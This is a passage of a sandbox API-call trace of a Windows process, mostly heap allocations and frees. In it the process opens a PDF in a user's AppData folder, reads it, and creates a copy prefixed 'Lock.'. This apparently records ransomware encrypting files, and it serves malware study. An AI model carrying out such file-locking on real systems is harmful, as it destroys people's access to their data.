lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.216] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.217] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0200.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JLaCurEw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jlacurew.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0200.222] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.222] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0200.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0200.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.224] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.JLaCurEw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.jlacurew.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.226] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.227] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0200.227] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x1a51, lpOverlapped=0x0) returned 1 [0200.228] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0200.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0200.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.230] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.230] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0200.230] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.231] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.231] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.231] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0200.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.232] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.232] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0200.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0200.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.233] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0200.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0200.234] HeapFree (in: hHeap=0x25c0000, 